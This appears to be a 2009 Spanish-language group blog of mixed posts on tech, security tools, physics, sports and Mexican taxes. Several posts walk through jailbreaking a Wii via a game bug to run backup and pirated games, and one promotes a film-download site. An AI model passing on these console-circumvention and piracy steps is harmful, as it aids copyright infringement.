Aunque sea un episodio que a todos nos gustaría olvidar, no nieguen que salieron en algún bailable durante la primaria o secundaria, esos bailables que las niñas montaban y después te obligaban a seguir aunque tu y tus cuates odiaran bailar, y más cuando se trata de bailar frente a los del 2°A los archienemigos de los de tu salón, el 2°C.

Sean sinceros y recuerden el bailable/fonomímica más vergonzoso de toda su vida... ahora vean el siguiente video y siéntanse aliviados..(otro motivo para aborrecer el ReGatón).


martes, 10 de noviembre de 2009

Recuperación de Archivos

Resulta que esta semana pasada me he topado con un caso muy particular, que muy probablemente a alguien ya le haya ocurrido, un asistente de un compañero formateo por error una maquina de un gerente, y encima le instalo Windows, como ustedes saben la probabilidad de recuperar los archivos baja, debido a la escritura ocurrida en el DD, aunque no es imposible. Intentamos con el Easy Recovery y no funciono, con otros 2 programas tampoco, hasta que nos encontramos con un OpenSource maravilloso llamado PCI Filerecovery, facilmente y sin mayor ciencia pudimos recuperar toda la información.

Homepage: http://www.pcinspector.de/ (alemán)
Download: http://www.pcinspector.de/Sites/file_recovery/download.htm?language=2 (alemán)
http://www.brothersoft.com/file-recovery-86397.html (ingles)

¡que más queremos, bueno, bonito y GRATIS!

Ubuntu 9.10

Bueno, si algo le faltaba a Ubuntu era mejorar un poco la interfaz gráfica, y con esta nueva versión lo han logrado, la verdad es que con la versión 9.10 tienes de todo y si algo te falta creeme que esta en la librería de programas descargables..

Ahora estoy trabajando en Linux, y la verdad bastante contento con el desempeño, no vislumbro por ahora nada que tenga que hacer exclusivamente con Windows.

Por otro lado, nunca me había puesto a curiosear sobre la cantidad de líneas que puede uno meter en Openoffice, es bien sabido que Office 2003 tiene máximo 65,536, pues en la hoja de Calculo de OpenOffice tienes un límite de solo 1,048,576 líneas. Esto resuelve un problema personal de una simple base de datos que tuve que construir porque tenía 250,000 registros y no podía manejar los datos (Este millón de líneas si se tiene en Office 2007).

viernes, 6 de noviembre de 2009

Linus Torvalds apoya Windows 7


Obvio que es una broma de Linus Torvalds, aparece "apoyando" a Windows 7 en el lanzamiento comercial que se realizo en Japon, algunos linuxeros de corazón han hecho algunos fotomontajes que son bastante entretenidos pueden verlos en: http://www.fark.com/cgi/comments.pl?IDLink=4723162&tt=s&pxs=1






gente chida - Stuntman

Este post me lo sugirió mi brother

para aquellos que nos consideramos ágiles y vivimos demasiado equivocados

Con ustedes: el auténtico hombre mono


miércoles, 4 de noviembre de 2009

Es hora de una buena terapia, pero para el cuarto

Estimadas ITCraudianas, aquí un link muy interesante con muchas ideas para renovar sus espacios y cuartos. Este sitio está super padre para poner a trabajar a sus galanes y dejar ese cuarto lleno de calcetines sucios y olores fétidos en el cuarto agradable que siempre han querido

Apartment Therapy es la opción

martes, 3 de noviembre de 2009

Restaurants, bars, etc

Aquí un buen link para aquellos viajeros que antes de aventurarse a algún restaurant o bar primero quieren ver que opinan los demás

Yelp es uno de los sitios más completos donde miles de personas colaboran en calificar lugares y dar comentarios al respecto. Un MUST definitivamente en sus favoritos.

El unico contra es que se enfoca mucho en EU. Poco a poco está creciendo, ya incluye UK


La mosca, la pelota, relatividad y algo más

Durante muchos minutos de nuestro trayecto de hoy a un curso de seguridad, Altair y yo discutimos sobre algo muy loco que apenas hemos entendido y que un profe medio loco descubrió llamado relatividad

El asunto era que divagavamos sobre que le pasaría a una mosca que viene muy feliz volando y de repente se mete al auto. Como cambia su movimiento?

Tiene la inercia de un auto a 100km por hora? o trae su propio movimiento o que pex

Aquí un video de motion and relativity


2009 Awards

Este post complementa las mejores herramientas opensource de seguridad

Premios 2009


Nessus se llevó la categoría en escaneo de vulnerabilidades

lunes, 2 de noviembre de 2009

Aikido - Al mero estilo seagal

Ya terminé finalmente la compilación de conocimiento y una de las cosas que voy a aprender es Aikido

Siempre me ha llamado la atención este ramo de las artes marciales ya que permite con evoluciones bien padrotas desarmar y someter a rivales

De por sí me gustaba ver como seagal rompía brazos etc. Pero ese no es el único motivador

Desgraciadamente muchos piensan que este estilo es poco práctico y parece más bien un baile

Sin contradecirlos necesariamente les digo que creo que bien aplicado puede ser super práctico y efevtivo

Aquí algunos videos con varios movimientos que la neta no parecen muy actuados

Aparte tengo los dvds completos de entrenamiento a su servicio





Y aqui superman

Buffer Overflow - un viejo enemigo

En más de una ocasión hemos escuchado el término buffer overflow en cuanto a vulnerabilidades de aplicaciones

Aquí un video explicatorio con un poco de metáfora que todos conocemos... una chela
y aparte uno un poco más tecnico

Este tipo de ataque es uno de los más usados y siempre aseguren con sus expertos en desarrollo que se tomen medidas precautorias para evitar problemas de seguridad

Siempre incluyan en sus pruebas de código un ataque de overflow

Happy bufferoverflowing






top 100 opensource security tools

aunque normalmente el open source es muy golpeado por el sw comeral, creo que en materia de seguridad de informacion muchas veces incluso e mejor y mas variado

Aqui una lista muy buena de los mejores 100 sw open source.
Desde analisis de vulnerabilidades hasta web applications analysis

Happy testing

Aquí va el detalle de lo que quieres postear

no muerdas el anzuelo

El phishing es un fenomeno en crecimiento y representa altos riesgos de fraude o robo de identidad

Finalmente existe una base de datos donde puedes reportar y verificar el status de sitios sospexhosos


https://www.phishtank.com/index.php


depues de todo muchas empresas hoy reciben aprox 90% de correo spam. Las empresas automoviisticas, electricay de gobierno son los mas afectados

domingo, 1 de noviembre de 2009

lo siento por los fans de lady gaga o black eyed peas

no soy el mas conocedor de musica pero se diferenciar el verdadero talento musical

se que los amantes del regggaeton y pop no gustaran mucho este post, pero los invito a apreciar verdadera musica.

En este caso un excelente cross over de jazz con un clasico de oro: rapsodia en azul

Vean todo el video y chequen los geniales detalles que t2e hacen ver cuando alguien nace con el don de la musica

Chequen al baterita que no puede evitar seguir el ritmo
Las sonrisas de los musicos al escuchar la magistral ejecucion del pano
Los gestos y melena de osawa en la direccion

Aqui el video


sábado, 31 de octubre de 2009

Yo creo que estos muchachos no fuman mucho

Para quienes gustamos del basketball es bastante divertido ver los juegos de estrellas y los concursos de clavadas (alburless)

Como ya es tradicional en los gringos, siempre tienen forma de hacer más espectáculo y ahora salieron con un deporte novedoso que une el basket con los trampolines

EL SLAMBALL


De wikipedia:
Slamball es un deporte creado aproximadamente en el 2000 y que rápidamente se ha expandido por la mayoría de Europa y otros sectores del mundo con cada vez más aficionados.

Es una especie de mezcla entre Rugby, hockey y Baloncesto, un espectáculo como sacado de algún juego de Playstation o Xbox, pero con personas de carne y hueso, en vivo y en directo. Acrobacias espectaculares, con mucha garra y adrenalina 100% caracteriza a este deporte.

Se practica en una superficie igual de larga y ancha que la de baloncesto, dentro de la denominada zona de triple son colocadas cuatro camas elásticas en el área cercana al aro, dos en horizontal y otras dos en vertical, los tiros de campo valen dos puntos, o tres si tira fuera de la línea de tres o si hace un mate.

Para mayor seguridad de los jugadores el aro no es de metal sino que está recubierto de una goma protectora.

Cuando existe un contacto dentro de la zona de tres da lugar a un penalti, que es una entrada a canasta del jugador que ha recibido la falta y un defensor del equipo contrario que intentara taponar.

Actualmente se rentransmite en cuatro


miércoles, 28 de octubre de 2009

wasp 2008

se ha liberado el estudio anual de wasp

interesantes estadisticaas de velnerabilidades en aplicaciones web

cuando pensaba ser productivo llega dj|hero


aqui un review del nuevo juego de wii

y si, es daft punk
dj hero

martes, 27 de octubre de 2009

Dejen de drogarse para volar... mejor salten de universo


Mientras algunos nos rompemos la cabeza tratando de entender a las mujeres, algunos muchachones dijeron, porque no entender el universo...

Con este breve comentario inicio este post que tenía muchas ganas de hacer.

Mucho se ha platicado del big gang y lo que originó nuestro planeta e incluso nuestra galaxia. Pero casi nunca se platica de la inmensidad del universo. Qué es el universo a final de cuentas? cuando mide?

Peor aún... Hay varios universos???

Prepárense a convulsionar y voltear los ojitos con la teoría de Multiversos (burbuja) y la famosa teoría M (teoría de membranas)

Avancen bajo propio riesgo


Me saltaré mucha info previa por razones de no abrumarlos con info (les recomiendo mucho ver la serie de discovery llamada "universo")

EL primer y segundos videos que veremos es una breve y sencilla, jejeje, explicación de lo que es la teoría de multiversos que a grandes razgos asemeja una serie de burbujas que reaccionan entre sí y donde hay muchas versiones de nosotros mismos y de todo... Es algo así como infinitos infinitos






Si aún no han vomitado de confusión o mareo universal, aquí va la teoría M. La teoría que aún esta sobre los escritorios de muchos y en los basureros de otros. A grandes razgos esta teoría dice que hay cierto tipo de membranas que al friccionarse entre ellas generan la existencia como la conocemos







Avísenme si este tipo de posts como que no inspira al team y los evitaré, de manera contraria opinen please

Happy universing

lunes, 26 de octubre de 2009

Descagas completas, peliculas, series, etc.


Un excelente amigo me hizo llegar el enlace a este sitio y la experiencia hasta ahora es bastante recomendable. Se pueden descargar casi cualquier película y serie.


Happy downloading.

Nuevo Ubuntu 9.10

Canonical anuncio hoy que el próximo jueves 29 de Oct estará lista para su descarga Ubuntu 9.10. Se comenta mucho sobre esta versión, nuevo diseño, arranque aun más rápido, mejor sonido, mejora de conectividad, etc... asi que ya espero con ansias :)

Les actualizo del tema en cuanto la haya instalado...

Internet Archive - Conocimiento para el mundo

Algunos posts anteriores comentaron el tema de la obscura era digital donde se plantea que mucho de nuestor conocimiento se perderá con el tiempo ya que los medios magnéticos y la gran diversidad de información hacen muy compleja la administración y preservación de conocimiento

Un esfuerzo muy interesante es el del internet archive, un sitio dedicado a recopilar conocimiento de multiples fuentes con la intención de que dicho conocimiento trasciena y sea alcanzable para todos.

Este colaborativo esfuerzo está tomando cada vez más fuerza y los invito a visitarlo

domingo, 25 de octubre de 2009

Comparte y ve tus revistas y documentos

En issu es posible ver muchísimas publicaciones de todo el mundo y puedes compartir contenido documental a tus amigos o comunidad

Este tipo de sitios se reproducen como conejos e issu es una alternativa interesante

Original diccionario visual

Nunca les ha pasado por la mente cómo se verían los significados de las palabras desde una forma gráfica?

Ok, quizá si estoy loco entonces. Pero no soy el único

Unos muchachones se dedicaron a crear este excelente sitio que te permite ver los significados y relaciones de una manera muy original

Vean como se ve la palabra woman

Get high - excelentes efectos pa volar

Para todos aquellos amantes de los efectos

EN http://gethighnow.com podrán encontrar excelentes efectos visuales y auditivos para despertar y confundir a su cerebro como estos:


Como instalar WADs en wii

Los WADs son los canales que se pueden instalar en el wii y que van desde sw específico hasta juegos directos

En este pequeño manual veremos como hacerlo

Estamos considerando que ya tienen el homebrew channel instalado y el WAD Manager. Además de esto se considera que se hizo en downgrade adecuado

Paso 1: descargen de internet el wad que quieran instalar. Algunos ejemplos son:
Emulador de SNES
Emulador de PSX
Emulador de NES
Mario Kart 64
Ocarina (cheat manager)

Estos archivos tienen una extensión WAD

Una vez descargados lo único que tiene que hacer es copiarlos a su memoria SD dentro de la carpeta WAD

Inserten en el wii el SD

Inicien el homebrewchannel e inicien posteriormente el wad manager

Dentro del mismo busquen los wads que desean instalar y posicionándose sobre ellos click en el botón " + "

Posteriormente iniciará la instalación (acepten con a)

y después al ver el mensaje de éxito click en home para reiniciar

y voilá

ya pueden ver el canal en su escritorio wii



Como quemar backups de Wii

Pensé que no sería necesario este post, pero después de las experiencias no tan gratas con algunos quemadores, sw y marcas de discos aquí va el cómo quemar backups de isos

Lo primero que necesitan es el software imgburn
De verdad les recominedo este sw porque algunos otros no te permiten usar la velocidad 4x para quemar dvds

Una vez que han conseguido una ISO (imagen de dvd en un sólo archivo) el proceso es muy sencillo






tip: usen dvds marca verbatim, es la única marca que no me ha fallado. Se que suena un poco exagerado, pero hasta que usé esta marca de dvds todos mis backups se quemaron excelentes

Abran el sw imgburn una vez instalado y den click en grabar una imagen a disco como lo indica la imagen




Posteriormente seleccionen la iso que desean quemar y asegúrense de que eligen 4x como velocidad (nota: puede ser que algunos quemadores nomás no se dejen. En este caso existe alta probabilidad de fallo en la operación



Para asegurarse de que se quemó correctamente quemen el dvd con la opción "verify"

No se asusten si después de quemar el dvd les pide que metan el dvd porque no se pudo automatizar el eject del dvd

Una vez hecho lo anterior hará la verificación y al final una musiquita bizarra informará sobre el éxito de la operación

No les sugiero borrar sus isos. Más adelante veremos como correrlas desde una usb directamente

Entrega fail octubre 2009

Tenía un buen rato que no posteaba fotos fail

La verdad es que es algo que nos alimenta y no podemos perderlo, por eso hice un esfuerzo por postear de nuevo esta sección

En esta ocasión una breve compilación de failblog de las que considero relevantes para sus ojos, conciencia y futuro

Como siempre: no intenten esto en casa






viernes, 23 de octubre de 2009

Nueva imagen de la udlap

Después de un larguísimo capítulo digno de Law and order la UDLAP ha liberado su nueva imagen

Altair nos puede platicar mucho de este tema, hoy me llego la foto y honestamente no la veo tan mal

Juzguen ustedes mismos


jueves, 22 de octubre de 2009

Mexico 1er lugar!!! en perdida de tiempo :(

En una encuesta (publicada en el periódico Reforma) realizada por Web@Work a
350 empleados y 350 gerentes de TI en Latinoamérica (Argentina, Brasil,
Chile, Colombia, México, Perú y América Central) se muestran algunos datos
dignos de análisis:

México presenta el más alto promedio de la región en cuanto al tiempo que
los empleados admiten navegar para cuestiones personales, con un total de
84 minutos al día (en un diferente análisis llevado a cabo por Microsoft se
dice que son 8.45 horas al mes, lo cual en lo personal se me hace poco).


72 % de los empleados tienen el hábito de visitar cinco o más páginas web de
carácter personal (las favoritas son: noticias, bancos, redes sociales).

27% de los gerentes de TI ofrecen acceso total a sitios Web 2.0 (a pesar de
entender que estos sitios no son necesarios para sus actividades laborales).

Más del 72% de los empleados admitieron que han realizado al menos una
actividad en línea que puso en riesgo la seguridad de sus empresas.

98% de los gerentes de TI admitieron que el comportamiento en línea de los
empleados proporciona una gran preocupación para la organización.

El área menos protegida continúa siendo el uso de Ipods y dispositivos USB.

4% de los gerentes de TI creen que su empresa está totalmente protegida y
96% piensan que están protegidos de alguna forma (parcialmente).

Para comenzar mis comentarios, la muestra a mi gusto fue muy pequeña, si
tomamos en cuenta que somos casi 28 millones de internautas en México, por
lo cual la encuesta fue al 0.00125 % de la población, sin embargo, con lo
que personalmente he visto los datos si los creo y de hecho pienso que
inclusive salieron bajos ya que el tiempo perdido laboral según mis cálculos
es de por lo menos el 30% y no del 17.5% como afirma la encuesta.

Algunas de las cuestiones que me preocupan, es que los gerentes de TI
continúen dando acceso a sitios webs que no tienen relación con el trabajo,
igualmente la falta de seguridad informática en las organizaciones es
alarmante y por último el poco involucramiento de los gerentes de TI en el
constante aprendizaje.

Finalizo este post con algunas recomendaciones de la Universidad de
Barcelona en el estudio “Uso del Tiempo”:
  • Nada con exceso
Evita el abuso de email, facebook o chat en horarios de mayor demanda de trabajo. Concéntrate en contestar mensajes importantes y deja para el final del día las visitas a los sitios personales.
  • Lleva un control
Registra tus actividades y pendientes laborales. Se trata de dar prioridad a cada acción, según su orden de importancia. (a mi gusto este punto es de los más importantes, ¿quién no ha pasado por la pregunta de “Que hace tu área”?, el registro nos apoyará incluso en ser más productivos.) Relájate Fija un espacio de 5 a 10 minutos para pararte a caminar, hacer una llamada pendiente. Evita que la ida por el café se convierta en media hora.
  • Ordena y limpia
Todas tus actividades requieren de esta característica, la cual abarca desde acomodar los documentos en el escritorio, guardar archivos en la computadora, llevar una agenda y un directorio electrónico de contactos.

martes, 20 de octubre de 2009

Esas cosas que encabronan - Gandallismo en aereopuerto de puebla


Todo iba muy bien

Pasé por mi vieja al aereopuerto ya que venía de houston en el vuelo que llega a las 8 PM

Me quedé bastante satisfecho con el miniaeropuerto de huejotzingo porque tiene todos los servicios aunque sean pequeños o no de super alto nivel

Casí salió perfecto ese día hasta que...

El maldito estacionamiento costaba 50 pesos la hora o fracción


En verdad tienen que ser tan gandallas?

Igual y alguno de ustedes dirá, ay ya, le hace a la ma...

Pero la verdad es un robo considerando que es un negocio cautivo

La segunda vez que fui al aereopuerto dije, ok, no me meto al estacionamiento porque hay lugar en el área de descenso

A los 2 minutos ya tenía a un poli diciéndome que no me podía estacionar ni siquiera 10 minutos

Como buen mexican urban hacker entonces apliqué lo que hacían los demás. Salirme del estacionamiento y esperar en la calle donde habían como 10 autos más. A los 5 minutos llegó una patrulla. Así que me moví una calle más adelante y me orille. A los 5 minutos llegó un guardia que me dijo por la malla que no podía. ASí que la siguiente maniobra fue dar vueltas y cuando finalmente llegó el pasajero pasé por el y a los 30 segundos ya tenía a un federal encima. Afortunadamente vio que ya venía el viajero y me dejó en paz.

En verdad necesitan ser tan molestos para obligar a las personas a pagar 50 pesos?
Gastan más en personal para obligarnos que decidir bajar la tarifa
Al rato van a contratar ladrones para asaltar a quienes no quieran estacionarse dentro

La verdad si quieren volverse ricos, pongan un estacionamiento al lado y cobren 20 pesos!!!

Y lo mismo pasa en las plazas comerciales... Aparte de que vas a gastar tu dinero en ellas te cobran el estacionamiento. Es un dineral!!!

En fin... sé que nada cambiará, pero ya me siento mejor

Aumento de impuestos

- ISR pasa del 28 al 30% para personas físicas que ganen más de 4 salarios mínimos mensuales (es decir más de $6,795 mensuales).
- Incremento del 15 al 16% el Impuesto al Valor Agregado (IVA) aplicable a 2010.
- Se incrementa del 2 al 3% en los depósitos de más de 15 mil pesos en un mes, antes era por 25 mil pesos.
- Internet y cable pagarán 3% adicional de Impuesto Especial Sobre Producción y Servicios (IEPS).
- IEPS de 28% a la cerveza; 170.9%, a los tabacos, así como tres pesos por litro de bebidas alcohólicas.

¿Que impacta esto a la población productiva del país que paga impuestos?
Muy simple, revisa los anteriores rubros, cuantifica cuanto pagas de cada uno y calcula el incremento aprobado por los diputados. Súmale a esto de todo lo que compras un 1% más por el aumento del IVA (aunque si declaras impuestos ese 1% es deducible directamente por el traslado del mismo).


Acorde a las noticias se indica que los impuestos serán a partir del 2010 y que algunos irán desapareciendo gradualmente hasta el 2014, claro, como así fue con la tenencia, si es que no se nos olvida.

¿Porque aumentar los impuestos? Porque somos sus contribuyentes cautivos, ya que no han logrado hacer nada contra los miles de personas que no pagan sus impuestos, es más fácil apoyarse del que ya saben que no tiene forma de zafarse. ¿Porque no recortar gastos? En cualquier empresa, cuando los ingresos bajan se hacen ajustes para disminuir gastos, en este caso parece imposible que no puedan resolver los problemas que tienen enfrente y la solución más sencilla es aumentar impuestos.

¿Repercusiones? Bien indicado por analistas económicos es que los países que mejor han hecho frente a la crisis lo hicieron bajando los impuestos, esto proporciona un mayor poder de compra y por ende mas circulación del capital, creando más plazas de empleo y mayores índices de producción, si nuevamente México adopta una posición paternalista y los diputados creen y apoyan que aumentando los ingresos fiscales podrán detener una caída, ¿no se encuentran siendo retrogradas?

El costo político esta divido, por eso se la jugaron bien en la cámara de diputados, finalmente la mayoría aprobó este plan de reforma, que si el gobierno es del pan y la mayoría de diputados del pri, si alguna de estas partes no hubiera querido simplemente esto no hubiera procedido. En lo personal vuelvo a poner en tela de juicio a todos aquellos políticos sean del partido que sean, ya que todos fueron cortados con la misma tijera, su objetivo principal son sus propios intereses y carreras políticas.

lunes, 19 de octubre de 2009

Ver películas en el wii


De seguro muchos de los que han usado un wii se han preguntado

Cómo es posible que no se puedan ver películas en este aparato

En este post, las indicaciones para hacerlo


Necesitan contar con el homebrewchannel y el wadmanager antes descritos ya instalados en el wii y haber realizado el downgrade
NOta: asegúrense de usar la versión de dvdx que corresponde a su versión de wii, en este caso se uso 3.4

Posteriormente descarguen y guarden los archivos en una memoria sd

Una vez entrado al homebrewchannel instalar el dvdx (aparece como un folder con un boot.elf) y elegir la opción install

Una vez realizado lo anterior abrir el mplayer desde el homebrew y ya se pueden ejecutar películas desde dvd o desde una usb o la sd

También se pueden avis, mp3, mpgs.

Aquí está el tutorial completo


Lo único que deben cambiar para la versión 3.4 es bajar el DVDx de dicha version (es el que usa la carpeta di).

Esto quiere decir que cuando usen el hombrewchannel el instalador del dvdx es uno con la extención .elf no la que es .dol

Happy moviessss

domingo, 18 de octubre de 2009

I had a dream... where all wiis were free


Habemus wii

Este domingo decidí hacerle algunos trucos al wii para poder correr juegos backup en la consola.

La verdad estoy muy satisfecho con algunos posts que vi en internet con manuales con ilustraciones donde se muestra paso a paso que hacer



De manera general necesitarán:
1 memoria SD de no más de 2GB. No usen microsd o similares
Rentar el juego Zelda Twilight Princess
COnexión a internet del wii y una laptop con lector sd e internet
Descargar los archivos mencionados y leer muy bien los manuales
OJO: no actualizar el wii y checar que versioón tienen. 3.3, 3.4, etc
Esto se ve en la parte de settings del wii


Antes de iniciar asegúrense:
La sd debe estar formateada en FAT
Chequen si su Wii es de EU y si usarán NTSC o PAL ya que esta info les ayudará más adelante
Mi wii sólo se conecta con Access Points a través de la wireless así que asegúrense que no usarán una conexión punto a punto

Ahora si:
Lo primero es instalar algo llamado homebrewchannel. Esto lo logran a partir de un defecto de programación del juego Zelda Twilight Princess

http://www.taringa.net/posts/juegos/2522213/(Wii)-%5BTutorial%5D-Instalar-homebrew-channel%5Bcon-imagenes%5D.html

Posteriormente necesitarán instalar el wadmanager. Los wads son piezas de sw o programas que corren como el wii, normalmente como canales de wii

http://www.taringa.net/posts/juegos/2522353/(wii)-Instalar-wads-(canales)-mediante-el-homebrew-channel.html

Una vez hecho lo anterior instalr el backup launcher

http://www.taringa.net/posts/juegos/2522541/(Wii)-Backup-Launcher-%C2%A1Juegas-juegos-truchos-sin-chip!.html

Poner atención en no repetir pasos

La verdad estos manuales están de lujo así que no es necesario poner más info al respecto

Sólo lean con cuidado y listo

Happy backupin'